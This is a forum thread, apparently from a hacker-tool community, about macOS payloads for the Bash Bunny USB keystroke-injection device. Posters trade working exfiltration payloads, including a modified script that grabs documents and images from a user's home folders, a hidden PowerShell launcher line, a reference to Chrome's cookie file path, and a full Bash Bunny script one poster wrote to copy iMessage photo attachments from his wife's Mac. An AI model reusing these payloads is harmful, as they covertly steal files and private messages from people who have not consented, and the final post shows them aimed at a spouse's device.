Jump to content

OS X Payloads


WiFiJuice
 Share

Recommended Posts

@WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. However, the one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-)

  • Like 1
Link to comment
Share on other sites

Granted this was my first attempt at running a payload from the BB on Mac OSX but even after choosing the correct ethernet device, the nmap payload failed because OSX requires root to run the OS fingerprinting functions. NMAP has been this way for a long time (even prior to the security upgrades introduced a couple of versions ago).

Working at an art school we run MacOS everywhere (80-90% of our machines across academic and administrative units)

I'll keep poking at it, but if anyone has an easy fix, I'm all ears.

Link to comment
Share on other sites

Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and don't you know- it works on them all!

However, @couchTornado has a valid point regarding NMAP and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if NMAP can't be used, what if we just call upon something inherent to Terminal? Such as:

  • Scan the available wireless networks: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s
  • Setup a network listener on port 2196 for testing: /usr/bin/nc -l 2196

  • Capture some packets: tcpdump -nS

  • Capture all the packets:tcpdump -nnvvXS

  • Capture the packets for a given port: tcpdump -nnvvXs 548

These are just a couple of things to consider while I toil away with a proper OSX NMAP hack.

Cheers!

Link to comment
Share on other sites

For reasons unknown to myself, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist, however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-)

  • Like 1
Link to comment
Share on other sites

Well @WiFiJuice I'll get working on it. However, here's a pertinent question, what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3. Restores and switches that won't execute payloads etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al to answer.

-Cheers

Link to comment
Share on other sites

Please don't tag everyone like that, if they deem it important enough for them to give their answer (Sebkinne answers if no one else has, or if he wants to add to something or if he wants to confirm something - but Darren rarely does). Not to mention you left me out ... :(

I myself have had no problems with firmware 1.3, and most of the payload library works with 1.3, therefore not working with 1.2 very well. Not sure why you would be getting weird switch errors..

Link to comment
Share on other sites

How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"

 

 

Link to comment
Share on other sites

2 hours ago, WiFiJuice said:

How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"

 

 

Use python.  Do not have the code off the top of my head right now but when I get around to it (too much at work right now and part of too many projects) I plan on making the BBTPS cross platform with the OSX and Linux agent parts being done in python.

 

Issue with the above is I know on Linux you need to be root or using sudo to mount a removable drive.  That is the reason I chose the network approach for the BBTPS so I do not have to worry about mounting anything on the victim.

 

 

Link to comment
Share on other sites

5 minutes ago, RazerBlade said:

It appears that to type ~ on Mac with Swedish Pro layout which most Swedish user do, it's alt + ¨ which the mac interprets as ~. So the keyboard file has to be changed.

Yes, that that little character is really important to be able to write out something like "~/Library/Application\\ Support/Google/Chrome/Default/Cookies"

Link to comment
Share on other sites

This is the layout of the Swedish Pro Keyboard. The se.json file in https://github.com/hak5/bashbunny-payloads/tree/master/languages is corrupt. It can't write out the very important Tilde sign " ~ " nor can it write out a backslash " \ ". Can anyone please help out to fix this issue? I will donate $50 in BTC to the one that fixes this, as I really need my BB to work.

swedish_notebook.png

  • Like 1
Link to comment
Share on other sites

  • 1 year later...

 

@Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work:

QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

script dies at this line with output  find: -exec: no terminating ";" or "+"

cant find any documentation on what may be happening.

Any help would be great.

 

Link to comment
Share on other sites

1 minute ago, ImInAjar said:

 

@Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work:

QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

script dies at this line with output  find: -exec: no terminating ";" or "+"

cant find any documentation on what may be happening.

Any help would be great.

 

Full script:

#!/bin/bash
LED G R
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E

lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/images
QUACK ENTER
QUACK DELAY 500
QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;
QUACK ENTER

# Sync filesystem
sync

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l)

if [ "$files" != "0" -o "$files2" != "0"]; then
  # Got spreadsheet files
  LED R B
else
  LED R
  # No spread sheets
fi

#Eject BB
QUACK diskutil unmount BashBunny; killall terminal

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...